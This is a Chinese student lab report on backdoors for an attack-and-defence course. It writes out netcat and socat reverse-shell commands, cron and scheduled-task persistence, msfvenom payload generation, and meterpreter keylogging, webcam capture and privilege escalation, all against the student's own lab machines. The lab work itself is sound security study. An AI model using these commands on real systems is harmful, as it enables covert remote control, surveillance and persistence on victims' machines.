首页 > 其他分享 >20222415 2024-2025-1 《网络与系统攻防技术》实验二实验报告

20222415 2024-2025-1 《网络与系统攻防技术》实验二实验报告

时间:2024-10-23 21:12:47浏览次数:7  
标签:exe 8888 主机 虚拟机 2024 2025 20222415 socat 输入

1.实验内容

本周学习了后门技术,包括后门的概念和实现方式,学习了后门攻击的过程和实践;并且初步学习了免杀。

2.实验过程

2.1使用netcat获取主机操作Shell,cron启动某项任务
(1)使用netcat获取主机操作
虚拟机登录root,主机在cmd窗口输入ncat.exe -l -p 8888
Linux虚机输入指令nc 192.168.3.48 8888 -e /bin/sh

在主机输入ls,成功显示文件目录,代表主机成功连接虚拟机shell。

(2)cron启动定时任务
在虚拟机输入crontab -e执行文字编辑器来设定定时任务
输入指令30 * * * * /bin/netcat 192.168.3.48 8888 -e /bin/sh并保存,输入crontab -l查看时程表

打开kali的/var/spool/cron/crontabs文件夹,可以看到多了一个root文件

在虚拟机中输入echo "* * * * * echo "20222415" > /home/tianruqi/2415.text" > /var/spool/cron/crontabs/root,每分钟将2415.txt内容覆盖为20222415。


启动成功。
2.2使用socat获取主机操作Shell, 任务计划启动
(1)安装socat
主机下载socat后在cmd窗口输入socat.exe tcp-listen:8888 exec:cmd.exe,pty,stderr

(2)前期准备
提前准备一个程序,代码如下:

虚拟机输入socat - tcp:192.168.1.114:8888进行连接

(3)启动任务计划
主机在cmd窗口输入命令schtasks /create /sc minute /mo 1 /tn "ruki20222415" /tr C:\Users\26704\Desktop\wlgf\trq20222415\trq20222415.exe
打开主机的任务管理器,可以看到任务名

2.3使用MSF meterpreter(或其他软件)生成可执行文件(后门),利用ncat或socat传送到主机并运行获取主机Shell
(1)生成后门文件
在虚拟机中输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.115 LPORT=8888 -f exe > 2415backdoor.exe

(2)将后门文件传给主机
在主机输入命令ncat.exe -lv 8888 > "C:\Users\26704\Desktop\wlgf\\2415backdoor.exe"

将文件放入kali中

(3)配置监听模块
在虚拟机输入msfconsole对监听模块进行配置

输入exploit运行监听模块,并在主机运行2415backdoor.exe
返回虚拟机查看,输入ls查看主机目录

2.4使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容的后门,并尝试提权
(1)在2.3完成之后,继续在exploit
输入keyscan_start获取键盘输入

输入screenshot截屏

输入webcam_snap拍照

(2)提权
输入命令backgrounduse exploit/windows/local/askset session 1set FILENAME WindowsUpdater.exerun进行提权
2.5使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell
在虚拟机输入命令msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.114 LPORT=8888 -x /root/tianruqi/Desktop/pwn20222415 -f elf > pwn2415

输入chmod a+x pwn2415给pwn2415给予权限并重复监听过程
在虚拟机打开另一个shell,运行pwn2415

返回第一个shell输入ls测试连接

成功连接

3.问题及解决方案

  • 问题1:cron没有成功设定定时任务
  • 问题1解决方案:一开是设置好后没有成功,我猜测是过程中哪里没有输对,于是我尝试重新设一下,但是在我重新做的过程中第一次设的定时任务突然就自己开始启动了,我猜测一开始没成功是因为没到设定的时刻,但是没有进行验证。

4.学习感悟、思考等

这次实验参考了其他同学的实验报告,但是即使是参考了实验报告,我在实验过程中也出现了很多的问题,比如命令输入的不对,或者压根找不到错误在哪,但是重新做一遍又好了。这次实验最让我感受到的就是我电脑的防火墙真的很把我的电脑保护得很好,我在做完实验后就把防火墙给打开了,立马就发现实验时在电脑上创建的文件被防火墙给清理了。
对于本次实验我还不理解的问题,我也会持续不断地学习,希望能在后面的学习中完全理解这个实验。

标签:exe,8888,主机,虚拟机,2024,2025,20222415,socat,输入
From: https://www.cnblogs.com/2415trq/p/18498356

相关文章

  • 2024智能机器人与自动控制国际学术会议 (IRAC 2024) 2024 International Conference on
    @目录一、会议详情二、重要信息三、大会介绍四、出席嘉宾五、征稿主题一、会议详情二、重要信息大会官网:https://ais.cn/u/vEbMBz提交检索:EICompendex、IEEEXplore、Scopus三、大会介绍2024智能机器人与自动控制国际学术会议(IRAC2024)由华南理工大学主办,会议将于2024......
  • CSP-J 2024 游记
    CSP-J2024游记Day\(-3\)忐忑不安地期待。做了一套模拟。ProblemScoreDifficultiesA\(100\)入门B\(50\)(贪心策略错了)普及-C\(50\)(双重循环\(n<=10^5\))普及D\(20\)(dp+前缀和,我写的DFS)普及+B题交完废了,幸好后面\(2\)题还行,总分......
  • cyi 源鲁杯2024第二轮wp
    Round2Web[Round2]Cmnts查看源码,base64解码得到路径get_th1s_f1ag.phpparse_str($_SERVER['QUERY_STRING']);#将url?后面的字段截取,并分别设置成变量(变量覆盖)主要逻辑在这块(感觉应该是想考变量覆盖的,但是好像代码写错了?)if(isset($key)&&$key==='a7a795a8efb7......
  • 2024秋软工实践《先天软工圣体队》团队展示与《卷卷福》选题报告
    一、开头表格软件工程课程班级链接作业要求第一次团队作业作业目标开发一个基于LLM大模型接口的软件,为传统的软件赋予全新的体验和功能。团队名称先天软工圣体队团队成员学号-名字102201312-陈言泷052206123-柯鸿毅102201531-周炳辉102201313-陈尚冰10......
  • 2024.10.23训练记录
    上午NOIP模拟A简单题。类比树状数组,反向做二维前缀和。在数组中对于左上角为{x_1,y_1},右下角为{x_2,y_2}的矩阵实现+k操作。只需要在{x_1,y_1},{x_2+1,y_2+1}位置+k,{x_2+1,y_1},{x_1,y_2+1}位置-k。最后再做一遍二维前缀和。很好想到的。想到是应该的。考试......
  • 2024秋软工实践 第二小组团队展示与选题报告
    作业所属课程https://edu.cnblogs.com/campus/fzu/SE2024作业要求https://edu.cnblogs.com/campus/fzu/SE2024/homework/13290作业的目标初步决定大作业选题,并进行需求分析和答辩团队名称旺仔水饺102201140黎曼102201130黄俊瑶102201127罗永辉102201......
  • 20241023 模拟赛总结
    期望得分:100+100+0+20=220实际得分:100+0+0+0=100(满昏)这算哪门子信心赛……分挂没了,懒得喷。T1人机分类讨论题。T2一眼二分答案,二分最终的最小的最大值,记bi表示把i这个位置加到至少ai需要多少次,然后手玩不知道多少组发现每个位置至少要操作一次,那机器人的启动位置是无......
  • 2024年人工智能、数字媒体技术与交互设计国际学术会议(ICADI 2024)
    @目录一、会议详情二、重要信息三、大会介绍四、出席嘉宾五、征稿主题一、会议详情二、重要信息大会官网:https://ais.cn/u/vEbMBz提交检索:EICompendex、IEEEXplore、Scopus三、大会介绍2024年人工智能、数字媒体技术与交互设计国际学术会议(ICADI2024)由天津职业技术......
  • 学期2024-2025-1 学号20241424 《计算机基础与程序设计》第5周学习总结
    学期2024-2025-1学号20241424《计算机基础与程序设计》第5周学习总结作业信息|这个作业属于2024-2025-1-计算机基础与程序设计)||-- |-- ||这个作业要求在|(https://www.cnblogs.com/rocedu/p/9577842.html#WEEK05))||这个作业的目标|<参考上面的学习总结模板,把学习过程通过......
  • 20222407 2024-2025-1 《网络与系统攻防技术》实验三实验报告
    一、实验内容本次实验的目标在于运用多重加密、文件格式伪装、数据填充、加壳等技术方法达成恶意代码的免杀效果,生成恶意程序,并对其进行测试,以检验其能否成功躲避杀毒软件的检测。本次实验具体内容如下:1.正确使用msf编码器,使用msfvenom生成如jar之类的其他文件;2.能够使用veil,加壳......